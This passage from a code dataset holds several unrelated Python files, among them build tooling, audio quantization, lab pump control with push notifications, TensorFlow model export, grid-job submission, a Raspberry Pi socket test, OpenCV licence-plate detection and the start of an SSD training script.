silent=silent)\n if not build_status['result']:\n return build_status\n # Clean Application after build if requested\n if post_clean:\n clean_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not clean_status['result']:\n return clean_status\n\n return build_status\n\n def build_bin(self, app, parallel=False, pre_clean=False, post_clean=False):\n # 
Clean Application before build if requested\n if pre_clean:\n build_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not build_status['result']:\n return build_status\n\n # Build Application\n build_status = self.build_target(app, parallel=parallel, target=str('bin'))\n if not build_status['result']:\n return build_status\n # Clean Application after build if requested\n if post_clean:\n clean_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not clean_status['result']:\n return clean_status\n\n return build_status\n\n def build_hex(self, app, parallel=False, pre_clean=False, post_clean=False):\n # Clean Application before build if requested\n if pre_clean:\n build_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not build_status['result']:\n return build_status\n\n # Build Application\n build_status = self.build_target(app, parallel=parallel, target=str('hex'))\n if not build_status['result']:\n return build_status\n # Clean Application after build if requested\n if post_clean:\n clean_status = self.build_target(app, parallel=parallel, target=str('clean'))\n if not clean_status['result']:\n return clean_status\n\n return build_status\n\n def get_build_size(self, app, parallel=False, silent=False):\n build_status = self.build_target(app, parallel=parallel, target=str('size'), silent=silent)\n build_size = dict()\n if build_status['result']:\n app_size_lines = build_status['build_msg']\n len_app_size_lines = len(app_size_lines)\n if len_app_size_lines >= 3:\n app_size_lines = app_size_lines[len_app_size_lines - 2:]\n section_names = app_size_lines[0].split()\n section_values = app_size_lines[1].split()\n for idx, section_name in enumerate(section_names):\n if section_name in BUILD_SIZE_SECTION_NAMES:\n build_size[section_name] = int(section_values[idx])\n else:\n build_status['result'] = False\n else:\n print_string(\"Build failed and there is no size information\")\n 
build_status['build_size'] = build_size\n return build_status\n\n def clean(self, app, parallel=False):\n build_status = self.build_target(app, target=str('clean'), parallel=parallel)\n return build_status\n\n def distclean(self, app, parallel=False):\n build_status = self.build_target(app, target=str('distclean'), parallel=parallel)\n return build_status\n\n def boardclean(self, app, parallel=False):\n build_status = self.build_target(app, target=str('boardclean'), parallel=parallel)\n return build_status\n\n def get_makefile_config(self, build_template=None):\n # current_build_templates = dict()\n ospclass = osp.OSP()\n build_template[\"APPL\"] = self.buildopts.get(\"APPL\", False)\n build_template[\"BOARD\"] = self.buildopts.get(\"BOARD\", False)\n build_template[\"BD_VER\"] = self.buildopts.get(\"BD_VER\", False)\n build_template[\"CUR_CORE\"] = self.buildopts.get(\"CUR_CORE\", False)\n build_template[\"TOOLCHAIN\"] = self.buildopts.get(\"TOOLCHAIN\", False)\n build_template[\"OLEVEL\"] = self.buildopts.get(\"OLEVEL\", False)\n osp_root = self.buildopts.get(\"EMBARC_OSP_ROOT\", False)\n\n if not all(build_template.values()):\n default_makefile_config = dict()\n _, default_makefile_config = ospclass.get_makefile_config(default_makefile_config)\n if not osp_root:\n osp_root = default_makefile_config.get(\"EMBARC_OSP_ROOT\")\n for key, value in build_template.items():\n if not value:\n build_template[key] = default_makefile_config.get(key, False)\n self.buildopts.update(build_template)\n\n osp_root, update = ospclass.check_osp(osp_root)\n self.make_options += 'EMBARC_ROOT=' + str(osp_root) + ' '\n self.buildopts[\"EMBARC_OSP_ROOT\"] = osp_root\n build_template[\"EMBARC_OSP_ROOT\"] = osp_root\n\n if not all(build_template.values()):\n try:\n returncode, cmd_output = pqueryTemporaryFile([\"make\", \"EMBARC_ROOT=\" + str(osp_root), \"info\"])\n default_build_option = None\n if not returncode and cmd_output:\n for line in cmd_output:\n if 
line.startswith(\"BUILD_OPTION\"):\n default_build_option = str(line.split(\":\", 1)[1]).split()\n break\n else:\n pass\n default_build_option_dict, _ = get_config(default_build_option)\n for key, value in build_template.items():\n if not value:\n build_template[key] = default_build_option_dict[key]\n self.buildopts.update(build_template)\n except Exception as e:\n print_string(\"Error: {}\".format(e))\n sys.exit(1)\n\n current_build_list = [\"%s=%s\" % (opt, build_template[opt]) for opt in BUILD_CONFIG_TEMPLATE.keys()]\n self.make_options = self.make_options + \" \".join(current_build_list)\n\n self.buildopts.update(build_template)\n generate_json(self.buildopts, self.embarc_config)\n\n print_string(\"Current configuration \")\n table_head = list()\n table_content = list()\n for key, value in build_template.items():\n table_head.append(key)\n table_content.append(value)\n msg = [table_head, [table_content]]\n print_table(msg)\n self.osproot = osp_root\n return build_template\n\n def get_build_template(self):\n\n build_template = BUILD_CONFIG_TEMPLATE\n build_template = collections.OrderedDict()\n return build_template\n","sub_path":"embarc_tools/builder/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":23992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"66420523","text":"import numpy as np\nimport librosa\ny, sr = librosa.load('audio.wav', sr=32000) \n\n# N = input(\"Enter the value of N(no. 
of bits) : \")\nN = 4 #4 bit quantizer\nlength = 320000\narr = []\nfinal1 = []\nfinal2 = []\n# print(\"Enter you array one by one \")\nfor x in range(length):\n arr.append(y[x])\n\nb = arr[0]\nfor x in range(length):\n if arr[x] > b:\n b = arr[x]\n\na = arr[0]\nfor x in range(length):\n if arr[x] < a:\n a = arr[x]\ncount = 0\nfor x in arr:\n final1.append((x-a)/(b-a)*(pow(2, N)-1))\n final1[count] = int(final1[count])\n final2.append(final1[count]*(b-a)/(pow(2, N)-1)+a)\n # final2[count] = int(final2[count])\n count = count+1\nfff = np.array(final2)\n\n# print(final2)\nlibrosa.output.write_wav('output_audio.wav', fff, sr)\n","sub_path":"DSP/1.2.1/1.2.1b.py","file_name":"1.2.1b.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643240697","text":"import sys\nimport pumpy\nimport logging\nimport time\nimport os\n# Push notification stuff\n\nimport httplib, urllib\n\npushover_user_key = os.environ['PUSHOVER_USER_KEY']\npushover_app_key = os.environ['PUSHOVER_PUMPY_APP_TOKEN']\n\n# Pusher\ndef push(message):\n conn = httplib.HTTPSConnection(\"api.pushover.net:443\")\n conn.request(\"POST\", \"/1/messages.json\",\n urllib.urlencode({\n \"token\": pushover_app_key,\n \"user\": pushover_user_key,\n \"message\": message,\n }), { \"Content-type\": \"application/x-www-form-urlencoded\" })\n conn.getresponse()\n\n\nlogging.basicConfig(level=logging.INFO)\n\nchain = pumpy.Chain('../../../../../dev/ttyUSB0')\nbufferPump = pumpy.PHD2000(chain,address=1, name=\"Buffer\") # PHD2000\ndosePump = pumpy.PHD2000(chain,address=12, name=\"Dose\") # special pump\n\n\n#Experimental Setup\n#Set flow rate for whole experiment\nglobalFlowRate = 100\n\ndoseList = [0.00,10.00,20.00,30.00,40.00,50.00,60.00,70.00,80.00,90.00,100.00]\n\n# Set diameters BD plastpak 10mL\nbufferPump.setdiameter(14.5)\ndosePump.setdiameter(14.5)\n\n# accepts a percent of the flow as a dosing, and how long one wants to 
dose for.\ndef doseIt(dose, doseTime):\n # blank condition\n if dose == 0:\n bufferPump.setflowrate(((100.00-dose)/100.00) * globalFlowRate)\n\n bufferPump.infuse()\n\n logging.info('Infusion started at ' + str(dose)) #+ 'percent dose for ' str((doseTime/60)) +'minutes...')\n time.sleep( doseTime )\n\n bufferPump.stop()\n logging.info('Infusion finished at ' + str(dose)) #+ 'percent dose for ' str((doseTime/60)) +'minutes...')\n else:\n bufferPump.setflowrate(((100.00-dose)/100.00) * globalFlowRate)\n dosePump.setflowrate((dose/100.00) * globalFlowRate)\n\n bufferPump.infuse()\n dosePump.infuse()\n\n logging.info('Infusion started at ' + str(dose)) #+ 'percent dose for ' str((doseTime/60)) +'minutes...')\n time.sleep( doseTime )\n\n bufferPump.stop()\n dosePump.stop()\n logging.info('Infusion finished at ' + str(dose)) #+ 'percent dose for ' str((doseTime/60)) +'minutes...')\n\n#iterates through a list of dosing percents and sens that to the infuse function.\ndef multiDoseIt(doses, doseTime):\n for dose in doses:\n doseIt(dose, doseTime)\n push(\"Started \" + str(dose) + \"% dose\")\n return logging.info('Next!')\n\n######## Experimental Protocol ###################\n# Does a 10 minut equilibration, followed by 10 different\n# doses with 5 minutes of dosing at each.\n\ndoseIt(0, 45 * 60) #single dose of buffer for 45 minutes to equilibrate\nmultiDoseIt(doseList, 5*60) #dose time of 5 mins\npush(\"Job Complete :)\")\nsys.exit()\n","sub_path":"01_12_2014_sanjiv.py","file_name":"01_12_2014_sanjiv.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313451773","text":"import os.path\nimport shutil\nimport re\n\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\nimport tf_graph_util\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n embed = hub.Module(\"https://tfhub.dev/google/nnlm-ja-dim50-with-normalization/1\")\n\n pl = tf.placeholder(shape=[None], 
dtype=tf.string)\n\n vector = tf.identity(embed(pl), name=\"OUTPUT\")\n\n savedmodel_dir = \"nnlm_ja_dim50_savedmodel\"\n tmp_savedmodel_dir = savedmodel_dir + \"_tmp\"\n if (os.path.exists(tmp_savedmodel_dir)):\n shutil.rmtree(tmp_savedmodel_dir)\n with tf.Session(graph=graph) as sess:\n sess.run([tf.global_variables_initializer(), tf.tables_initializer()])\n tf.saved_model.simple_save(sess, tmp_savedmodel_dir, inputs={\"text\":pl}, outputs={\"vector\": vector})\n\ndef freeze_graph(input_saved_model_dir, output_saved_model_dir, node_names):\n with tf.Session() as sess:\n meta_graph_def = tf.saved_model.loader.load(sess, [tf.saved_model.tag_constants.SERVING], input_saved_model_dir)\n node_names = node_names + [n for n in meta_graph_def.collection_def[\"table_initializer\"].node_list.value]\n node_names = node_names + [re.sub(r':\\d$', \"\", n) for n in meta_graph_def.collection_def[\"asset_filepaths\"].node_list.value]\n #frozen_graph_def = tf.graph_util.convert_variables_to_constants(sess, meta_graph_def.graph_def, node_names)\n frozen_graph_def = tf_graph_util.convert_variables_to_constants(sess, meta_graph_def.graph_def, node_names)\n\n if tf.gfile.IsDirectory(output_saved_model_dir):\n tf.gfile.DeleteRecursively(output_saved_model_dir)\n with tf.Graph().as_default() as graph:\n tf.import_graph_def(frozen_graph_def, name=\"\")\n if len(meta_graph_def.collection_def[\"table_initializer\"].node_list.value) > 0:\n main_op = graph.get_operation_by_name(meta_graph_def.collection_def[\"table_initializer\"].node_list.value[0])\n else:\n main_op = None\n assets = meta_graph_def.collection_def[\"asset_filepaths\"].node_list.value\n assets = [graph.get_tensor_by_name(n) for n in assets]\n with tf.Session() as sess:\n builder = tf.saved_model.builder.SavedModelBuilder(output_saved_model_dir)\n builder.add_meta_graph_and_variables(\n sess, [tf.saved_model.tag_constants.SERVING],\n signature_def_map=meta_graph_def.signature_def,\n assets_collection=assets,\n 
main_op=main_op)\n builder.save()\n\nfreeze_graph(tmp_savedmodel_dir, savedmodel_dir, [\"OUTPUT\"])\nshutil.rmtree(tmp_savedmodel_dir)\n","sub_path":"models/text_embeddings/nnlm_ja_dim50_export_savedmodel.py","file_name":"nnlm_ja_dim50_export_savedmodel.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379593052","text":"import json\nimport os\n\n\ndef jtring2p(jtring):\n \"\"\"parse\"\"\"\n\n if jtring:\n rs = json.loads(\"[\" + jtring[:-2] + \"]\")\n else:\n rs = []\n return rs\n\n\ndef fput_string(fp, content: dict):\n \"\"\"add\"\"\"\n\n ipdn = -1\n\n if not os.path.exists(fp):\n with open(fp, \"w\"):\n pass\n else:\n with open(fp, \"r\") as f:\n while True:\n raw_content = f.readline()\n if not raw_content:\n break\n ipdn += 1\n\n content.update({\"ipdn\": int(ipdn + 1)})\n\n jtr = json.dumps(content, ensure_ascii=False)\n\n with open(fp, \"a\", encoding=\"utf8\") as f:\n\n f.write(f'{jtr},\\n')\n\n\ndef fget_string(fp, jtr2p=None):\n \"\"\"read\"\"\"\n\n jtr2p = jtr2p or jtring2p\n\n with open(fp, \"r\", encoding=\"utf8\") as f:\n content = f.read()\n\n return jtr2p(content)\n\n\ndef fupdate_string(fp, attr, content):\n \"\"\"create or update\"\"\"\n\n if not os.path.exists(fp):\n with open(fp, \"w\") as f:\n content.update({\"ipdn\": 0})\n jtr = json.dumps(content, ensure_ascii=False)\n f.write(f'{jtr},\\n')\n\n return 0\n\n with open(fp, \"r\") as f:\n raw_content = json.loads(\"[\" + f.read()[:-2] + \"]\")\n\n ipdn = None\n for raw in raw_content:\n if content.get(attr) == raw.get(attr):\n ipdn = raw.get(\"ipdn\")\n break\n\n if ipdn is not None:\n content.update({\"ipdn\": ipdn})\n raw_content[ipdn] = content\n else:\n ipdn = len(raw_content)\n content.update({\"ipdn\": ipdn})\n raw_content.append(content)\n\n with open(fp, \"w+\") as f:\n for raw in raw_content:\n jtr = json.dumps(raw, ensure_ascii=False)\n f.write(f'{jtr},\\n')\n\n return ipdn\n\n\nif 
__name__ == \"__main__\":\n\n print(fupdate_string(\"test.dpt\", \"type\", {\"type\": \"ping3\", \"analyze\": {\"cmd\": \"fping -a baidu.com\", \"avg\": 30}}))\n print(fget_string(\"test.dpt\"))\n","sub_path":"jtring.py","file_name":"jtring.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414827579","text":"import logging\nimport time\nimport os.path\n\n\n# 创建logger实例\nlogger_name = 'mylogger'\nlogger = logging.getLogger(logger_name)\n# 设置日志级别 即只有日志级别大于等于DEBUG的日志才会输出\nlogger.setLevel(logging.DEBUG)\n\n\n# 以当天日期作为日志名称\nct = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n# os.path.dirname()获取指定文件路径的上级路径\npath_dir = os.path.dirname(__file__)\nlog_path = os.path.abspath(os.path.dirname(path_dir))+'/log'\nlog_name = os.path.join(log_path, ct+'.log')\n\n# 创建FileHandler处理器 将warn级别及以上的日志信息输出到指定文件\nfh = logging.FileHandler(log_name, encoding='utf8')\nfh.setLevel(logging.WARNING)\n\n\n# 创建StremHandler处理器 将DEBUG级别及以上的日志信息输出到控制台\nsh = logging.StreamHandler()\n# sh.setLevel(logging.DEBUG)\n\n\n# 设置输出格式\n# asctime:打印日志的世界 levename:打印日志级别名称 funcname:打印日志的当前函数 message:打印日志信息\nfmt = '%(asctime)s - %(levelname)s - %(message)s'\ndatefmt = '%Y-%m-%d %H:%M:%S'\nformatter = logging.Formatter(fmt, datefmt)\n\n\n# 添加处理器和格式到logger\nfh.setFormatter(formatter)\nsh.setFormatter(formatter)\nlogger.addHandler(fh)\nlogger.addHandler(sh)\n\n\ndef debug(message):\n logger.debug(message)\n\n\ndef info(message):\n logger.info(message)\n\n\ndef warning(message):\n logger.warning(message)\n\n\ndef error(message):\n logger.error(message)\n\n\ndef exception(e):\n logger.exception(e)\n# 测试\n# logger.warning('张欢的自动化测试框架')\n","sub_path":"Common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624138372","text":"#! 
/usr/bin/env python\n\n# @file submit_grid.py\n# @author Joakim Olsson \n# @brief Launch grid jobs with the MLTree package\n# @date October 2016\n\nimport os\nimport subprocess as sp\n\ntry:\n __version__ = sp.check_output([\"git\",\"describe\",\"--tags\"], cwd=os.path.dirname(os.path.realpath(__file__))).strip()\nexcept:\n print(\"git not available to extract current tag\")\n __version__ = \"test\"\n\nimport argparse\nparser = argparse.ArgumentParser(add_help=True, description=\"Launch grid jobs\", epilog=\"version: {0:s}\".format(__version__))\nparser.add_argument(\"--user\", required=True, type=str, dest=\"user\", metavar=\"\", help=\"Username\")\nparser.add_argument(\"--tag\", required=False, type=str, dest=\"tag\", default = __version__, metavar=\"\", help=\"Output file tag\")\nparser.add_argument(\"--datasets\", type=str, dest=\"datasets\", required=False, default=\"datasets.json\", metavar = \"\", help=\"JSON file specifying the input and output datasets.\")\nparser.add_argument(\"--nFilesPerJob\", required=False, type=int, dest=\"nFilesPerJob\", default=1, help=\"Number of files per job\")\n# If sub-jobs exceed the walltime limit, they will get killed. 
When you want to submit long running jobs (e.g., customized G4 simulation), submit them to sites where longer walltime limit is available by specifying the expected execution time (in second) to the --maxCpuCount option.\nparser.add_argument(\"--maxCpuCount\", required=False, type=int, dest=\"maxCpuCount\", default=172800, help=\"Max CPU time (default: 48 hrs)\")\nparser.add_argument(\"--dry-run\", dest=\"dryrun\", action=\"store_true\", help=\"Don't submit any jobs\")\nargs = parser.parse_args()\n\nimport json\ndatasets = json.load(file(args.datasets))\ninDSs = datasets.get(\"inDSs\", {})\noutDSs = datasets.get(\"outDSs\", {})\n\ndoBuild = True\ndoBuildAll = True\n\nsetup = \"MLTree/MLTreeMaker.py\"\nconfig = \"--nFilesPerJob \"+str(args.nFilesPerJob)+\" --maxCpuCount \"+str(args.maxCpuCount)\n\ncomFirst = \"pathena {} --outDS {} --inDS {} {}\"\ncomLater = \"pathena {} --outDS {} --inDS {} --libDS LAST {}\"\n\n# Submit jobs to the grid with pathena\n# https://twiki.cern.ch/twiki/bin/view/PanDA/PandaAthena\nfor i, inDS, outDS in zip(xrange(len(inDSs)), inDSs, outDSs):\n outDS = \"user.\"+args.user+\".\"+outDS+\"_\"+args.tag\n if (i==0 and doBuild) or doBuildAll:\n command = comFirst.format(setup, outDS, inDS, config)\n else:\n command = comLater.format(setup, outDS, inDS, config)\n sp.call(\"echo \"+command, shell=True)\n if not args.dryrun:\n sp.call(command, shell=True)\n","sub_path":"python/launch_jobs.py","file_name":"launch_jobs.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365090332","text":"import json\nimport socket\n\nROWS = 20\nCOLUMNS = 15\n\n\nclass Cell: # contains cell data for each cell on the grid.\n def __init__(self, row_, column_, explored):\n self.obstacle = 0\n self.virtual_wall = 0\n self.explored = explored\n self.row = row_\n self.column = column_\n\n\nclass Connection:\n def __init__(self):\n self.socket = 0\n self.host = '192.168.22.1'\n 
self.port = 9999\n\n def connect_to_rpi(self):\n self.socket = socket.create_connection((self.host, self.port))\n if socket is not 0:\n print(\"connected successfully\")\n\n def send_to_rpi(self, message):\n try:\n self.socket.sendall(message)\n except Exception as e:\n print(e)\n\n def close_connection(self):\n self.socket.close()\n\n def get_socket_instance(self):\n return self.socket\n\n\ndef create_maze_grid(rows, columns): # creates grid and updates it with cell objects. Returns grid list.\n grid_temp = []\n for row in range(rows):\n grid_temp.append([])\n for column in range(columns):\n cell = Cell(row, column, 0)\n if row > 16 and column < 3:\n cell.explored = 1\n if row < 1 or row > 18 or column < 1 or column > 13:\n cell.virtual_wall = 1\n grid_temp[row].append(cell)\n\n return grid_temp\n\n\ndef main():\n grid = create_maze_grid(ROWS, COLUMNS)\n connection = Connection()\n connection.connect_to_rpi()\n s = connection.get_socket_instance()\n mdf_status_update = make_mdf_string(grid)\n connection.send_to_rpi(mdf_status_update.encode('UTF-8'))\n reply = s.recv(1024)\n print(reply)\n connection.close_connection()\n\n\ndef make_mdf_string(grid):\n mdf_exploration = '11'\n mdf_obstacle = ''\n for i in range(ROWS-1, -1, -1):\n for j in range(COLUMNS):\n mdf_exploration = mdf_exploration + str(grid[i][j].explored)\n if grid[i][j].explored == 1:\n mdf_obstacle = mdf_obstacle + str(grid[i][j].obstacle)\n\n if len(mdf_obstacle) % 8 is not 0:\n dummy = '0'*(8 - (len(mdf_obstacle) % 8))\n mdf_obstacle = dummy + mdf_obstacle\n\n mdf_exploration = mdf_exploration + '11'\n mdf_exploration_hex = hex(int(mdf_exploration, 2))[2:]\n mdf_obstacle_hex = hex(int(mdf_obstacle, 2))[2:]\n no_of_digits_obs = int(len(mdf_obstacle) / 4)\n mdf_obstacle_hex = \"0\" * (no_of_digits_obs - len(mdf_obstacle_hex)) + mdf_obstacle_hex\n mdf_json = {'map': {'exploration': mdf_exploration_hex,\n 'obstacle': mdf_obstacle_hex}}\n mdf_json = json.dumps(mdf_json)\n mdf_json = 'a|' + mdf_json\n\n 
return mdf_json\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/Comm_test.py","file_name":"Comm_test.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363479611","text":"import cv2\n# Opencv Kütüphanesini Projeme Dahil ediyorum.\nimport numpy as np\n#Numpy kütühanesi dahil etme işlemi // Maskeleme işlemlerinde kullanılacak\n\ndef resimAc(sec):\n # Dosyadan resim okumak için dosyamın yolunu seciyoruz.\n img = cv2.imread(\"Resim/\" + sec)\n cv2.namedWindow(\"1-Orjinal Resim\", cv2.WINDOW_NORMAL)\n # resm göstermek için bir pencere oluşturma\n cv2.imshow(\"1-Orjinal Resim\", img)\n # Ekranda resim gösterme işlemi\n return img\n\n# RGB uzayından Gri seviyeli resme dönüş işlemi\ndef griyecevir(img):\n img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n cv2.namedWindow(\"2-Griye Donusturme İslemi\", cv2.WINDOW_NORMAL)\n # Pencre Oluştur\n cv2.imshow(\"2-Griye Donusturme İslemi\", img_gray)\n # Resmi Göster\n return img_gray\n\n#2. Gauss Filtreleme , Medyan ortalama ile aynı işi yapan fonk.\n## gürültü azaltıcı yumuşatma işlemi\n#Her pikselin yoğunluğunu, yakındaki piksellerin yoğunluk ortalamasının ağırlıklı ortalaması ile değiştirir\n#Diğer üç filtre kenarları pürüzsüz hale getirirken sesleri kaldırır, ancak bu filtre, kenar #koruyarak görüntünün gürültüyü azaltabilir. 
\n\ndef gurultuAzalt(img_gray):\n gurultuazalt = cv2.bilateralFilter(img_gray, 9, 75, 75)\n cv2.namedWindow(\"3-Gürültü Temizleme islemi\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"3-Gürültü Temizleme islemi\", gurultuazalt)\n return gurultuazalt\n\n# Daha iyi sonuç elde etmek için histogram eşitleme işlemi yapıyoruz\ndef histogramEsitleme(gurultuazalt):\n histogram_e = cv2.equalizeHist(gurultuazalt)\n cv2.namedWindow(\"4-Histogram esitleme islemi\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"4-Histogram esitleme islemi\", histogram_e)\n return histogram_e\n\n\n# Açma İşlemi(Opening):\n#Aşındırma ile küçük parçalar yok edildikten sonra dilation ile görüntü tekrar genişletilerek küçük parçaların kaybolması sağlanır.\n#gürültülerin etkisi azaltılır.\ndef morfolojikIslem(h_esitleme):\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n morfolojikresim = cv2.morphologyEx(h_esitleme, cv2.MORPH_OPEN, kernel, iterations=15)\n cv2.namedWindow(\"5-Morfolojik acilim\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"5-Morfolojik acilim\", morfolojikresim)\n return morfolojikresim\n\n\n#Resim üzerinde düzensiz bölümleri dengelemek.\n# veya iki resim arasındaki değişiklikleri saptamak için görüntü çıkarma kullanılır.(Image subtraction).\ndef goruntuCikarma(h_esitleme,morfolojik_resim):\n # Görüntü çıkarma (Morph görüntüsünü histogram eşitlenmiş görüntüsünden çıkarmak)\n gcikarilmisresim = cv2.subtract(h_esitleme, morfolojik_resim)\n cv2.namedWindow(\"6-Goruntu cikarma\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"6-Goruntu cikarma\", gcikarilmisresim)\n return gcikarilmisresim\n\n\n\n# görüntüdeki her pikseli siyah bir piksel ile değiştirir; Formul var ona göre yapıyor\n# görüntü yoğunluğu bu sabitten büyükse beyaz bir piksel\ndef goruntuEsikle(goruntucikarma):\n ret, goruntuesikle = cv2.threshold(goruntucikarma, 0, 255, cv2.THRESH_OTSU)\n cv2.namedWindow(\"7-Goruntu Esikleme\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"7-Goruntu Esikleme\", goruntuesikle)\n return goruntuesikle\n\n\n#Görüntünün kenarlarını 
algılamak için canny edge kullandım\ndef cannyEdge(goruntuesikleme):\n canny_goruntu = cv2.Canny(goruntuesikleme, 250, 255)\n cv2.namedWindow(\"8-Canny Edge\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"8-Canny Edge\", canny_goruntu)\n canny_goruntu = cv2.convertScaleAbs(canny_goruntu)\n return canny_goruntu\n\n\n#Dilatasyon operatörü, girdi olarak iki veri alanını alır.\n# Birincisi dilate edilecek olan resimdir. İkincisi, yapılandırma unsuru cekirdek\n#Dilate, Büyümek, Genişletmek\ndef genisletmeIslemi(cannedge_goruntu):\n # Kenarları güçlendirmek için genleşme\n cekirdek = np.ones((3, 3), np.uint8)\n # Genişletme için çekirdek oluşturma\n gen_goruntu = cv2.dilate(cannedge_goruntu, cekirdek, iterations=1)\n cv2.namedWindow(\"9-Genisletme\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"9-Genisletme\", gen_goruntu)\n return gen_goruntu\n\n\ndef konturIslemi(img,gen_goruntu):\n # Kenarlara dayanan resimdeki Konturları Bulma\n new, contours, hierarchy = cv2.findContours(gen_goruntu, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)[:10]\n # Rakamları alana göre sıralama, böylece sayı plakası ilk 10 konturda olacak\n screenCnt = None\n # kontur dng işlemi\n for c in contours:\n # yaklaşık çizgi belirliyoruz\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.06 * peri, True) # % 6 hata ile yaklaşıklık\n # Yaklaşık konturuzun dört noktası varsa, o zaman\n # ----Plakamızı yaklaşık olarak bulduğumuzu varsayabiliriz.\n\n if len(approx) == 4: # Konturu 4 köşeli olarak seçiyoruz\n screenCnt = approx\n break\n \t\n final = cv2.drawContours(img, [screenCnt],-1, (9, 236, 255), 3) # KARENİN RENGİ VE ÇİZİMİ\n # Seçilen konturun orijinal resimde çizilmesi\n cv2.namedWindow(\"10-Konturlu Goruntu\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"10-Konturlu Goruntu\", final)\n return screenCnt\n\n##Belirnenen alan dışında kalan yerleri maskeleme\ndef maskelemeIslemi(img_gray,img,screenCnt):\n # Numara plakası dışındaki kısmı maskeleme\n mask = 
np.zeros(img_gray.shape, np.uint8)\n yeni_goruntu = cv2.drawContours(mask, [screenCnt], 0, 255, -1, )\n yeni_goruntu = cv2.bitwise_and(img, img, mask=mask)\n cv2.namedWindow(\"11-Plaka\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"11-Plaka\", yeni_goruntu)\n return yeni_goruntu\n\ndef plakaIyilestir(yeni_goruntu):\n # Daha fazla işlem için numara plakasını geliştirmek için histogram eşitleme\n y, cr, cb = cv2.split(cv2.cvtColor(yeni_goruntu, cv2.COLOR_RGB2YCrCb))\n # Görüntüyü YCrCb modeline dönüştürme ve 3 kanalı bölme\n y = cv2.equalizeHist(y)\n # Histogram eşitleme uygulama\n son_resim = cv2.cvtColor(cv2.merge([y, cr, cb]), cv2.COLOR_YCrCb2RGB)\n # 3 kanalı birleştirme\n #cv2.namedWindow(\"Gelismis_plaka_no\", cv2.WINDOW_NORMAL)\n #cv2.imshow(\"Gelismis_plaka_no\", son_resim)\n return son_resim\n","sub_path":"fonksiyonlar.py","file_name":"fonksiyonlar.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543476186","text":"import os\r\nimport pickle\r\nimport sys\r\n\r\nimport cv2\r\nimport keras\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom keras.backend.tensorflow_backend import set_session\r\nfrom keras.callbacks import (EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard)\r\nfrom keras.models import Model\r\nfrom keras.optimizers import Adam\r\nfrom keras.preprocessing import image\r\n\r\nfrom nets.ssd import SSD300\r\nfrom nets.ssd_training import Generator, MultiboxLoss\r\nfrom utils.anchors import get_anchors\r\nfrom utils.utils import BBoxUtility\r\n\r\nfrom keras.utils import multi_gpu_model # add 2021.2.3\r\n\r\n# ----------------------------------------------------#\r\n# 检测精度mAP和pr曲线计算参考视频\r\n# https://www.bilibili.com/video/BV1zE411u7Vw\r\n# ----------------------------------------------------#\r\n\r\n# 调用多GPU训练时需要\r\nclass ParallelModelCheckpoint(ModelCheckpoint):\r\n def __init__(self,model,filepath, 
monitor='val_loss',\r\n save_weights_only=True,save_best_only=False, period=1):\r\n self.single_model = model\r\n super(ParallelModelCheckpoint,self).__init__(filepath, monitor, save_weights_only, save_best_only, period)\r\n\r\n def set_model(self, model):\r\n super(ParallelModelCheckpoint,self).set_model(self.single_model)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n Cuda = True\r\n log_dir = \"logs/\"\r\n annotation_path = '2007_train.txt'\r\n # ----------------------------------------------------#\r\n # 训练之前一定要修改NUM_CLASSES\r\n # 修改成所需要区分的类的个数+1。\r\n # ----------------------------------------------------#\r\n NUM_CLASSES = 7\r\n # ----------------------------------------------------#\r\n # input_shape有两个选择。\r\n # 一个是(300, 300, 3)、一个是(512, 512, 3)。\r\n # 这里的SSD512不是原版的SSD512。\r\n # 原版的SSD512的比SSD300多一个预测层;\r\n # 修改起来比较麻烦,所以我只是修改了输入大小\r\n # 这样也可以用比较大的图片训练,对于小目标有好处\r\n # ----------------------------------------------------#\r\n input_shape = [300, 300, 3]\r\n\r\n # ----------------------------------------------------#\r\n # 可用于设定先验框的大小,默认的anchors_size\r\n # 是根据voc数据集设定的,大多数情况下都是通用的!\r\n # 